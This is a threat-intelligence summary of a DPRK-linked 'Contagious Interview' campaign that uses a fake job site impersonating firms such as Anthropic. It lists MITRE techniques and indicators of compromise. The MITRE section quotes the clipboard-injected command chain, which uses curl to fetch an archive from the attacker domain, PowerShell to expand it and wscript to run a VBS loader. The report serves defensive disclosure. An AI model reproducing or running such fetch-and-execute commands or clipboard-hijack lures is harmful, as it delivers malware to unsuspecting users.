A DPRK-linked campaign called Contagious Interview is using a highly polished fake job platform (lenvny[.]com and related domains) to socially engineer AI, crypto, and software talent into executing a clipboard‑hijacking ClickFix workflow that delivers multi-stage malware. The lure mimics legitimate hiring UX, impersonates firms like Anthropic and Anchorage Digital, and uses a clipboard-replaced command that downloads a staged archive and executes a VBScript loader. #ContagiousInterview #lenvny
Keypoints
- The campaign is a DPRK-linked Contagious Interview variant using a fully realized React Next.js fake job platform (lenvny[.]com) to target job seekers.
- Operators built realistic job listings impersonating firms such as Anthropic, Yuga Labs, Anchorage Digital, and others to attract AI, crypto, and software talent.
- The application flow collects personal details and resumes, asks for social/dev links, and culminates in a “Video Introduction” step that triggers the ClickFix malware delivery.
- The site implements clipboard hijacking: when victims copy text, the clipboard is replaced with a command that downloads a staged ZIP and runs a VBS loader via wscript.
- The multi-stage payload uses a fake “graphics-driver” downloader misdirection, curl to fetch a malicious archive from app[.]lenvny[.]com, PowerShell to expand it, and wscript to execute update.vbs.
- This operation increases success probability by blending into normal remote hiring workflows, exploiting user habits (copy/paste) and targeting high-value capabilities (AI models, crypto systems).
- Recommendations to job seekers include verifying official domains, avoiding uploads to unverified sites, running unknown scripts in VMs/sandboxes, and scrutinizing off-domain interview requests.
MITRE Techniques
- [T1059 ] Command and Scripting Interpreter – Used to execute the multi-stage infection chain via shell, curl, PowerShell, and wscript: “echo curl -L … -o driver-update.exe … & curl -k -o “%TEMP%fixed.zip” “https[:]//app[.]lenvny[.]com/cam-v-abc123.fix” … powershell -Command “Expand-Archive -Force -Path ‘%TEMP%fixed.zip’ -DestinationPath ‘%TEMP%fixed’” && wscript “%TEMP%fixedupdate.vbs”.”
- [T1115 ] Clipboard Data – Clipboard hijacking was implemented with a copy event listener that replaces user clipboard contents with the attacker command to induce paste-execution: “…the handler swaps the victim’s legitimate selection with a platform‑specific malicious payload.”
- [T1190 ] Exploit Public-Facing Application – The lure abuses a public-facing fake job application to trick users into performing actions (copy/paste) that lead to code execution: “a fully formed, React Next.js based job platform … mirrors the UX of contemporary hiring systems.”
- [T1537 ] Transfer Data to Cloud Account – The archive and payloads are retrieved from attacker-controlled infrastructure (app[.]lenvny[.]com) using curl, demonstrating data/payload transfer from remote host: “curl -k -o “%TEMP%fixed.zip” “https[:]//app[.]lenvny[.]com/cam-v-abc123.fix”.”
- [T1064 ] Scripting – VBScript loader executed via wscript to perform final-stage actions and persistence: “wscript “%TEMP%fixedupdate.vbs”.”
- [T1606 ] Forge Web Credentials – Site impersonation and fabricated company pages, badges, and testimonials are used to deceive targets and gain credentials/information: “professional-looking badges … fabricated testimonial quotes, and the logos of well-known tech companies.”
Indicators of Compromise
- [Domain ] Malicious/fake job platforms and attacker infrastructure – lenvny[.]com, app[.]lenvny[.]com (used to host cam-v-abc123.fix)
- [Domain ] Additional associated domains impersonating services – advisorflux[.]com, assureeval[.]com, carrerlilla[.]com
- [IP Address ] Hosting/infrastructure examples – 69.62.86.78, 72.61.9.45
- [Filename/Command ] Clipboard-injected command and staged artifacts – driver-update.exe (fake downloader), %TEMP%fixed.zip, %TEMP%fixedupdate.vbs
Read more: https://www.validin.com/blog/inside_dprk_fake_job_platform/